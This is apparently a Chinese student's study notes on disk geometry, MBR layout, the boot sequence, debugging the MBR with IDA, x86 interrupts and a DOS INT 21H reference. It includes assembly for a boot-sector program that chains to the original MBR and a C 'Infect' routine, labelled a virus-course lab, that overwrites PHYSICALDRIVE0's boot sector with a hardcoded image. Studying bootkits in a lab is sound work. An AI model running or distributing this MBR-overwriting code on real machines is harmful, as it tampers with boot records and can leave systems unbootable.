磁盘学习+MBR学习

磁头数： 硬盘总共有几个磁头，也就是几面盘片，硬盘式由多个盘片组成的，

                  而每个盘片上都有一个读写磁头复制该盘片的读写操作，磁头数最大为255

柱面数： 表示硬盘每一面盘片上有几条磁道，最大为1023   10个二进制位。

扇区：     表示每一条 磁道/柱面 上有几个扇区，最大为63 6个二进制位。每个扇区一般为 512 字节

CHS寻址方式 中， 磁头 柱面  扇区 的取值范围 为  0~255 , 0~1023 , 1~63

BIOS int 13H  是BIOS 提供的磁盘基本输入输出中断调用，它可以完成磁盘的复位，读写，校验，定位，诊断，格式化等功能。

                          使用CHS寻址方式， 因此最大识别访问 8GB左右的硬盘。

现代大容量硬盘一般采用 LBA 线性地址方式寻址，替代CHS寻址。

MBR 

处理器加电/复位后，如果硬盘式首选的启动设备，

那么ROM-BIOS 将试图读取硬盘的0面0道1扇区。这就是主引导扇区

读取的主引导扇区数据有512字节，ROM-BIOS将它加载到逻辑地址0x0000:0x7c00处

也就是物理地址 0x07c00 处，然后判断它是否有效

有效的主引导扇区，最后两字节为   0x55 + 0xAA  ROM-BIOS程序先检测这两个标志，

如果主引导扇区有效，则以一个段间转移指令 jmp 0x0000:0x07c00 调到哪里继续执行

学习：

主要分为5部分：   1引导程序 446字节 （包含WINDOWS磁盘签名 保留位） 2分区表 3结束标志

512字节

 1引导程序 占 440字节 0x1b8 

 WINDOWS磁盘签名   后面4字节为WINDOWS磁盘签名  它是WINDOWS系统在初始化时写入的，WINDOWS依靠 磁盘签名来识别磁盘  如果丢失则WINDOWS认为该磁盘没有被初始化

保留位紧接着是两个字节保留字节 暂时没有被MBR使用的位置

2分区表

在保留的两个字节后64字节 0x40 则保存分区表（DPT disk partition table）   用来管理磁盘分区的  如果丢失 磁盘分区就会丢失 每16字节描述一个分区项的数据

由于字节数的限制，一个磁盘最多可以4个主硬盘分区，  硬盘中的磁盘可以分为主磁盘分区+扩展分区

3 结束标志  55AA表示

以此类推  可以判断有几个硬盘································

调试之前先要了解windows系统启动过程
1、开机
2、BIOS加点自检（Power On Self Test，即POST），此时电源稳定后，CPU从内存地址0fff:0000处开始执行
3、将硬盘第一个扇区(0磁头0柱面1扇区）读取内存地址0000:7c00处
4、检测（WORD）0000:7dfe是否等于0xaa55,若不等于则转去尝试其他启动介质，如果没有其他启动介质则显示"No ROM BASIC"
5、跳转到0000:7c00处执行MBR中的程序

6、MBR首先将自己复制到0000:0600处，然后继续执行
7、在主分区表中搜索标志为活动的<span style="white-space:pre">	</span>分区。如果发现没有活动分区或有不止一个活动分区，则显示“Invalid partiton table”
8、将活动分区的第一个扇区读入内存地址0000:7c00处
9、检测（WORD）000:7dfe是否等于0xaa55，若不等于则显示"Miss Operating System"，然后停止，或尝试软盘启动
10、跳转到0000:7c00处继续执行DBR
11、启动系统

以上步骤中2，3，4，5步由BIOS的引导程序完成，6、7、8、9、10步由MBR中的引导程序完成。
知道了过程，调试就简单多了，所以过程是分析一个很关键的步骤。
·
关于MBR的调试看willJ大大的文章吧~

调试MBR   

这里用IDA  分析：

IDA调试MBR比较简单，先配置下虚拟机的VMX文件，添加一下代码：


debugStub.listen.guest32 = "TRUE"
debugStub.hideBreakpoints = "TRUE"
bios.bootDelay = "3000"

打开IDA--Debugger--Attach--Remote GDB debugger

Hostname为localhost，port为8832

启动虚拟机后点击上面窗口OK按钮，弹出选择附加进程，选择第一个，点OK

在MBR载入内存的地方下断，也就是断在0x7c00

这个时候最好Alt+s下，选择16位的模式，因为这个时候还未进入32位模式！！！！要不然分析有错误

学习转载于 http://www.52pojie.cn/thread-173889-1-1.html

下面为几个MBR钟的代码片段：

学习转载于  http://www.52pojie.cn/thread-215498-1-1.html

访问显存，也需要使用逻辑地址   ： 段地址：偏移地址

访问内U承诺使用DS，也可以使用ES

不能直接写   mov es,0xb800

要写成   mov es,ax

ASCII码：      0     -      9           A        -        Z           a      -      z

    0x30 - 0x39         0x41            0x5A      0x61 -       0x7A 

字符显示属性：   

0x7c      表示    无高亮   背景色   黑       前景色白

CLD  REP MOVSB   解释：

；example：把当前数据段中偏移1000H开始
；的100个字节数据传送到偏移2000H开始的
；单元中


    cld                ；指针增值
    push   DS          ；当前数据段，因此压入栈中保存                 
    pop    ES          ；使ES=DS
    mov    SI，1000H   ；源串指针初值
    mov    DI，2000H   ；目的串指针初值
    mov    CX，100     ；循环次数
Next：
    lodsb              ；取一个字节  把SI指向的存储单元读入累加器
    stosb              ；存一个字节  可以将累加器AL中的值传递到当前DI地址处
    loop   Next        ；循环CX次


；以下程序片段与上面的等价：


    cld                ；地址指针增值
    ……
    mov   CX，100      ；循环CX次
Next：
    movsb              ；每次传送一字节数据
    loop  Next


；或者用更简单的写法：
    cld
    ……
    mov   CX,100
    rep   movsb

中断学习：

所有的严重事件都必须无条件地加以处理，这种类型的中断是不会被阻断和屏蔽的，称为非屏蔽中断（Non Maskable Interrupt，NMI）。

Intel处理器允许256个中断，中断号的范围是0～255，8259负责提供其中的15个，但中断号并不固定。之所以不固定，是因为当初设计的时候，允许软件根据自己的需要灵活设置中断号，以防止发生冲突。该中断控制器芯片有自己的端口号，可以像访问其他外部设备一样用in和out指令来改变它的状态，包括各引脚的中断号。正是因为这样，它又叫可编程中断控制器（Programmable Interrupt Controller，PIC）。
图`

内部中断   

div / idiv 除数为0  或者除法溢出 产生中断0

当处理器遇到非法指令时，将产生 中断6

软中断

int 3          //断点中断指令  机器指令为CC  当处理器执行到int 3   即发生3号中断，专区执行相应的中断处理程序

int imm8

into

中断处理程序执行也要用到各个寄存器，会破坏它们的内容，但PUSH 指令不会，我们可以在该程序内先压栈 所有相关寄存器+内存单元

然后分别取出予以显示，它们就是中断前的现场内同，最后再恢复那条指令的第1 字节

int3 和 int 3 不一样的，前者为CC  后者为CD 03   这就是通常所说的 int n  操作吗为 0cCD   

int 0x00     //引发0号中断

int 0x15 //引发0x15号中断

int 0x16 //引发0x16号中断   键盘服务

into 是溢出中断指令，机器码wie  0xCE 也是单字节指令。

最有名的的软中断  为  BIOS 中断。   在计算机加电后，BIOS程序 执行期间建立起来的，这些中断功能在加载+执行主引导扇区之前就已经可以使用了mo

mov   ah,0x00     //从键盘读字符

int      0x16         //键盘服务，返回时，字符代码在寄存器AL中

执行后，中断服务例程会监视键盘动作，当它返回时，会在寄存器AL中存放按键的ASCII码

表：DOS系统功能调INT 21H

AH	功能	调用参数	返回参数
00	程序终止(同INT 20H)	CS=程序段前缀
01	键盘输入并回显		AL=输入字符
02	显示输出	DL=输出字符
03	异步通迅输入		AL=输入数据
04	异步通迅输出	DL=输出数据
05	打印机输出	DL=输出字符
06	直接控制台I/O	DL=FF(输入) DL=字符(输出)	AL=输入字符
07	键盘输入(无回显)		AL=输入字符
08	键盘输入(无回显) 检测Ctrl-Break		AL=输入字符
09	显示字符串	DS:DX=串地址 '$'结束字符串
0A	键盘输入到缓冲区	DS:DX=缓冲区首地址 (DS:DX)=缓冲区最大字符数	(DS:DX+1)=实际输入的字符数
0B	检验键盘状态		AL=00 有输入 AL=FF 无输入
0C	清除输入缓冲区并 请求指定的输入功能	AL=输入功能号 (1,6,7,8,A)
0D	磁盘复位		清除文件缓冲区
0E	指定当前缺省的磁盘驱动器	DL=驱动器号 0=A,1=B,...	AL=驱动器数
0F	打开文件	DS:DX=FCB首地址	AL=00 文件找到 AL=FF 文件未找到
10	关闭文件	DS:DX=FCB首地址	AL=00 目录修改成功 AL=FF 目录中未找到文件
11	查找第一个目录项	DS:DX=FCB首地址	AL=00 找到 AL=FF 未找到
12	查找下一个目录项	DS:DX=FCB首地址 (文件中带有*或?)	AL=00 找到 AL=FF 未找到
13	删除文件	DS:DX=FCB首地址	AL=00 删除成功 AL=FF 未找到
14	顺序读	DS:DX=FCB首地址	AL=00 读成功   =01 文件结束,记录中无数据   =02 DTA空间不够   =03 文件结束,记录不完整
15	顺序写	DS:DX=FCB首地址	AL=00 写成功   =01 盘满   =02 DTA空间不够
16	建文件	DS:DX=FCB首地址	AL=00 建立成功   =FF 无磁盘空间
17	文件改名	DS:DX=FCB首地址 (DS:DX+1)=旧文件名 (DS:DX+17)=新文件名	AL=00 成功 AL=FF 未成功
19	取当前缺省磁盘驱动器		AL=缺省的驱动器号 0=A,1=B,2=C,...
1A	置DTA地址	DS:DX=DTA地址
1B	取缺省驱动器FAT信息		AL=每簇的扇区数 DS:BX=FAT标识字节 CX=物理扇区大小 DX=缺省驱动器的簇数
1C	取任一驱动器FAT信息	DL=驱动器号	同上
21	随机读	DS:DX=FCB首地址	AL=00 读成功   =01 文件结束   =02 缓冲区溢出   =03 缓冲区不满
22	随机写	DS:DX=FCB首地址	AL=00 写成功   =01 盘满   =02 缓冲区溢出
23	测定文件大小	DS:DX=FCB首地址	AL=00 成功(文件长度填入FCB) AL=FF 未找到
24	设置随机记录号	DS:DX=FCB首地址
25	设置中断向量	DS:DX=中断向量 AL=中断类型号
26	建立程序段前缀	DX=新的程序段前缀
27	随机分块读	DS:DX=FCB首地址 CX=记录数	AL=00 读成功   =01 文件结束   =02 缓冲区太小,传输结束   =03 缓冲区不满
28	随机分块写	DS:DX=FCB首地址 CX=记录数	AL=00 写成功   =01 盘满   =02 缓冲区溢出
29	分析文件名	ES:DI=FCB首地址 DS:SI=ASCIIZ串 AL=控制分析标志	AL=00 标准文件   =01 多义文件   =02 非法盘符
2A	取日期		CX=年 DH:DL=月:日(二进制)
2B	设置日期	CX:DH:DL=年:月:日	AL=00 成功   =FF 无效
2C	取时间		CH:CL=时:分 DH:DL=秒:1/100秒
2D	设置时间	CH:CL=时:分 DH:DL=秒:1/100秒	AL=00 成功   =FF 无效
2E	置磁盘自动读写标志	AL=00 关闭标志 AL=01 打开标志
2F	取磁盘缓冲区的首址		ES:BX=缓冲区首址
30	取DOS版本号		AH=发行号,AL=版本
31	结束并驻留	AL=返回码 DX=驻留区大小
33	Ctrl-Break检测	AL=00 取状态   =01 置状态(DL) DL=00 关闭检测   =01 打开检测	DL=00 关闭Ctrl-Break检测   =01 打开Ctrl-Break检测
35	取中断向量	AL=中断类型	ES:BX=中断向量
36	取空闲磁盘空间	DL=驱动器号  0=缺省,1=A,2=B,...	成功:AX=每簇扇区数      BX=有效簇数      CX=每扇区字节数      DX=总簇数 失败:AX=FFFF
38	置/取国家信息	DS:DX=信息区首地址	BX=国家码(国际电话前缀码) AX=错误码
39	建立子目录(MKDIR)	DS:DX=ASCIIZ串地址	AX=错误码
3A	删除子目录（RMDIR）	DS:DX=ASCIIZ串地址	AX=错误码
3B	改变当前目录(CHDIR)	DS:DX=ASCIIZ串地址	AX=错误码
3C	建立文件	DS:DX=ASCIIZ串地址 CX=文件属性	成功:AX=文件代号 错误:AX=错误码
3D	打开文件	DS:DX=ASCIIZ串地址 AL=0 读   =1 写   =3 读/写	成功:AX=文件代号 错误:AX=错误码
3E	关闭文件	BX=文件代号	失败:AX=错误码
3F	读文件或设备	DS:DX=数据缓冲区地址 BX=文件代号 CX=读取的字节数	读成功:   AX=实际读入的字节数   AX=0 已到文件尾 读出错:AX=错误码
40	写文件或设备	DS:DX=数据缓冲区地址 BX=文件代号 CX=写入的字节数	写成功:   AX=实际写入的字节数 写出错:AX=错误码
41	删除文件	DS:DX=ASCIIZ串地址	成功:AX=00 出错:AX=错误码(2,5)
42	移动文件指针	BX=文件代号 CX:DX=位移量 AL=移动方式(0:从文件头绝对位移,1:从当前位置相对移动,2:从文件尾绝对位移)	成功:DX:AX=新文件指针位置 出错:AX=错误码
43	置/取文件属性	DS:DX=ASCIIZ串地址 AL=0 取文件属性 AL=1 置文件属性 CX=文件属性	成功:CX=文件属性 失败:CX=错误码
44	设备文件I/O控制	BX=文件代号 AL=0 取状态   =1 置状态DX   =2 读数据   =3 写数据   =6 取输入状态   =7 取输出状态	DX=设备信息
45	复制文件代号	BX=文件代号1	成功:AX=文件代号2 失败:AX=错误码
46	人工复制文件代号	BX=文件代号1 CX=文件代号2	失败:AX=错误码
47	取当前目录路径名	DL=驱动器号 DS:SI=ASCIIZ串地址	(DS:SI)=ASCIIZ串 失败:AX=出错码
48	分配内存空间	BX=申请内存容量	成功:AX=分配内存首地 失败:BX=最大可用内存
49	释放内容空间	ES=内存起始段地址	失败:AX=错误码
4A	调整已分配的存储块	ES=原内存起始地址 BX=再申请的容量	失败:BX=最大可用空间      AX=错误码
4B	装配/执行程序	DS:DX=ASCIIZ串地址 ES:BX=参数区首地址 AL=0 装入执行 AL=3 装入不执行	失败:AX=错误码
4C	带返回码结束	AL=返回码
4D	取返回代码		AX=返回代码
4E	查找第一个匹配文件	DS:DX=ASCIIZ串地址 CX=属性	AX=出错代码(02,18)
4F	查找下一个匹配文件	DS:DX=ASCIIZ串地址 (文件名中带有?或*)	AX=出错代码(18)
54	取盘自动读写标志		AL=当前标志值
56	文件改名	DS:DX=ASCIIZ串(旧) ES:DI=ASCIIZ串(新)	AX=出错码(03,05,17)
57	置/取文件日期和时间	BX=文件代号 AL=0 读取 AL=1 设置(DX:CX)	DX:CX=日期和时间 失败:AX=错误码
58	取/置分配策略码	AL=0 取码 AL=1 置码(BX)	成功:AX=策略码 失败:AX=错误码
59	取扩充错误码		AX=扩充错误码 BH=错误类型 BL=建议的操作 CH=错误场所
5A	建立临时文件	CX=文件属性 DS:DX=ASCIIZ串地址	成功:AX=文件代号 失败:AX=错误码
5B	建立新文件	CX=文件属性 DS:DX=ASCIIZ串地址	成功:AX=文件代号 失败:AX=错误码
5C	控制文件存取	AL=00封锁   =01开启 BX=文件代号 CX:DX=文件位移 SI:DI=文件长度	失败:AX=错误码
62	取程序段前缀		BX=PSP地址

从吾爱上拷贝一段    MBR  编写 代码：

http://www.52pojie.cn/thread-173889-1-1.html

;File: MBR.ASM
;Author: willJ
;Date: 2012.11.24
;Compile: nasm -f bin MBR.ASM -o MBR.COM
;////////////////////////////////////////////////////////////////////////////////
jmp START
DATA:
    db "I Love 52Pojie!",0xa,0xd   ;需要显示的数据
START:
    xor bx, bx                                                    ;清零bx寄存器
    mov ds, bx                                                    ;将ds清零
    mov ax, [0x413]                                               ;0x413记录了BIOS的内存可用区域
                                                                  ;从高到低分配的
    sub ax, 2                                                     ;ax-2就是分配2KB空间
    mov [0x413], ax                                               ;更新0x413的值
    shl ax, 0x6                                                   ;这里是计算出分配的段起始地址
                                                                  ;左移6位就是乘2的6次方
                                                                  ;以为16位汇编寻址为段寄存器*16+寄存器的方式
                                                                  ;所以这里得ax*1024/16所以为左移2的6次方
    mov es, ax                                                    ;得到的段寄存器复制给es      
    mov si, 0x7c00                                                ;赋值si为0x7c00，也就是代码起始位置    
    xor di, di                                                    ;清零di       
    mov cx, 0x200                                                 ;大小为0x200也就是512字节       
    rep movsb                                                     ;将自己分配过去达到内存驻留的效果
    push es                                                       ;将es压栈
    push Main
    retf                                                          ;相当于jmp指令，跳向Main的地方        
Main:  
    call ShowMessage                                              ;显示信息
    call GetInput                                                 ;获取用户输入，如果是回车就启动系统
    call BootOriginOs                                             ;启动原始系统
ShowMessage                                                       ;利用int 10h中断显示信息
    mov bp, DATA                                                  ;需要显示的内容
    mov cx, 0xF                                                   ;显示的内容大小
    mov ah, 0x13                                                  ;中断功能号
    mov al, 0x01                                                  ;al显示的方式
    mov bh, 0x00                                                  ;bh为0显示页就是当前页面
    mov bl, 0x0c                                                  ;bl为0xc表示字体属性，这里显示为红色
    xor dx, dx                                                    ;dh,dl为表示行坐标，列坐标，这里为0
    int 10h                                                       ;调用10H中断
    ret
GetInput:                                                         ;接受用户输入
    mov ah, 0x00                                                  ;ah表示0号子功能
    int 16h                                                       ;调用16H中断，从键盘读字符
    and ax, 0xff                                                  ;ah/al=扫描码/ASCII
    cmp al, 0xd                                                   ;比较输入是不是为回车，回车ASCII为0xd       
    jnz GetInput                                                  ;不相等就循环，相等就返回
    ret
BootOriginOs:                                                     ;启动操作系统
    xor dx, dx                                                    ;清零dx
    mov es, dx                                                    ;赋值es为0
    mov ah, 0x02                                                  ;调用Int 13H中断的2号子功能
    mov al, 0x01                                                  ;al为1表示读取1个扇区
    mov ch, 0x00                                                  ;ch为0表示0号柱面
    mov cl, 0x02                                                  ;cl为2表示读取第二个扇区，也就是备份的原MBR
    mov dx, 0x80                                                  ;80表示读取为硬盘
    mov bx, 0x7c00                                                ;es:bx为内存缓冲区地址，就是要载入到那个内存去
    int 13h                                                       ;调用13H中断
    jmp 0x0:0x7c00                                                ;跳向内存0x7c00继续执行
times 510-($-$$)  db 0                                            ;$表示当前地址，$$表示起始地址，
                                                                  ;这个代码表示将510字节剩余的空间0填充
dw  0xAA55                                                        ;最后两个字节为55AA，也就是MBR结束标志

利用nasm编译程序，然后利用Winhex导出2进制，这里可以直接手工调用将MBR复制到第二扇区，然后将我们的代码复制进第一扇区，我这里写一个程序实现

VC 6.0 编写 可以覆盖MBR 并且  保存原始MBR代码，MBR 在上面另外生成   拷贝即可

unsigned char MBR[512] = {
	0xEB, 0x1B, 0x78, 0x69, 0x61, 0x6E, 0x67, 0x63, 0x68, 0x61, 0x6E, 0x67, 0x71, 0x75, 0x61, 0x6E, 
	0x2B, 0x32, 0x30, 0x31, 0x31, 0x31, 0x32, 0x32, 0x30, 0x32, 0x31, 0x0A, 0x0B, 0x31, 0xDB, 0x8E, 
	0xDB, 0xA1, 0x13, 0x04, 0x83, 0xE8, 0x02, 0xA3, 0x13, 0x04, 0xC1, 0xE0, 0x06, 0x8E, 0xC0, 0xBE, 
	0x00, 0x7C, 0x31, 0xFF, 0xB9, 0x00, 0x02, 0xF3, 0xA4, 0x06, 0x68, 0x3E, 0x00, 0xCB, 0xE8, 0x06, 
	0x00, 0xE8, 0x15, 0x00, 0xE8, 0x1B, 0x00, 0xBD, 0x02, 0x00, 0xB9, 0x19, 0x00, 0xBA, 0x05, 0x05, 
	0xBB, 0x0C, 0x10, 0xB8, 0x01, 0x13, 0xCD, 0x10, 0xC3, 0xB4, 0x00, 0xCD, 0x16, 0x3C, 0x0D, 0x75, 
	0xF8, 0xC3, 0x31, 0xD2, 0x8E, 0xC2, 0xB8, 0x01, 0x02, 0xBB, 0x00, 0x7C, 0xB9, 0x02, 0x00, 0xBA, 
	0x80, 0x00, 0xCD, 0x13, 0xEA, 0x00, 0x7C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x55, 0xAA
};
#define  MBR_SIZE 512
VOID Infect() 
{ 
    HANDLE  handle;  
    BYTE   *pStr;  
    DWORD   Length;  
    handle = ::CreateFile("\\.\PHYSICALDRIVE0", 
		GENERIC_WRITE   | GENERIC_READ, 
		FILE_SHARE_READ | FILE_SHARE_WRITE, 
		NULL, 
		OPEN_EXISTING, 
		0, 
		NULL  
		);  
    if (INVALID_HANDLE_VALUE == handle) 
    { 
        MessageBox(NULL, "Open DISK error!", "Wrong", MB_OK);  
        return;  
    } 
    pStr = (BYTE*)VirtualAlloc(NULL, MBR_SIZE, MEM_COMMIT, PAGE_READWRITE | PAGE_NOCACHE);  
    if (NULL == pStr) 
    { 
        MessageBox(NULL, "VirtualAlloc() Error!", "Wrong", MB_OK);  
        return;  
    } 
    SetFilePointer(handle, 0, NULL, FILE_BEGIN);  
    if (!ReadFile(handle, pStr, MBR_SIZE, &Length, NULL)) 
    { 
        MessageBox(NULL, "ReadFile() Error!", "Wrong", MB_OK);  
        return;  
    } 
    //将原来的MBR写入第二个扇区里面  
    SetFilePointer(handle, MBR_SIZE, NULL, FILE_BEGIN);  
    if (!WriteFile(handle, pStr, MBR_SIZE, &Length, NULL)) 
    { 
        MessageBox(NULL, "WriteFile() Error!", "Wrong", MB_OK);  
        return;  
    } 
    //修复MBR当中的分区表  
    memcpy(&MBR[0x1be], pStr+0x1be, 4 * 16);  
    SetFilePointer(handle, 0, NULL, FILE_BEGIN);  
    if (!WriteFile(handle, MBR, MBR_SIZE, &Length, NULL)) 
    { 
        MessageBox(NULL, "WriteFile() MBR Error!", "Wrong", MB_OK);  
        return;  
    } 
    VirtualFree(pStr, MBR_SIZE, MEM_RELEASE);  
    CloseHandle(handle);
	MessageBox(NULL, "感染成功", "Right", MB_OK);
    return;  
}

病毒课程实验 也放这里吧····

重要的几条指令：

备份主引导记录的方法是：
DEBUG （回车） 
-A 100 
XXXX:0100 MOV AX,201 
XXXX:0103 MOV BX,200 
XXXX:0106 MOV CX,1 
XXXX:0109 MOV DX,80 
XXXX:010C INT 13 
XXXX:010E INT 3 
读入 主引导记录 到 200

XXXX:010F 
-G=100 
-R CX 
CX 0001:200 
-N BOOT.ZYD 
-W 200 
-Q
写入 BOOT.ZYD 


还原硬盘主引导记录的方法是：
DEBUG （回车） 
-N BOOT.ZYD 
-L 200 
-A 100 
XXXX:0100 MOV AX,301 
XXXX:0103 MOV BX,200 
XXXX:0106 MOV CX,1 
XXXX:0109 MOV DX,80 
XXXX:010C INT 13 
XXXX:010E INT 3 
XXXX:010F 
-G=100 
-Q


备份DOS分区引导记录的方法是：
-L 100 201 格式：L[地址][盘号:][逻辑扇区号][扇区数]
	   功能：将一个文件或盘的绝对扇区装入存储器。 
-N BOOT.DOS 格式：N[盘号: ] [路径] [文件名] [扩展名]
	   功能：定义DEBUG使用的文件。 
-R CX 
CX 0001:200 
-W 100  在使用不带参数的W命令之前，BX和CX中应包含要写入文件的字节数
	，BX为高位，CX为低位  W[地址] [盘符:] [起始扇区] [扇区数] 
-Q

还原DOS分区引导记录的方法是：
DEBUG （回车）
-N BOOT.DOS 
-L 100 
-W 100 201 
-Q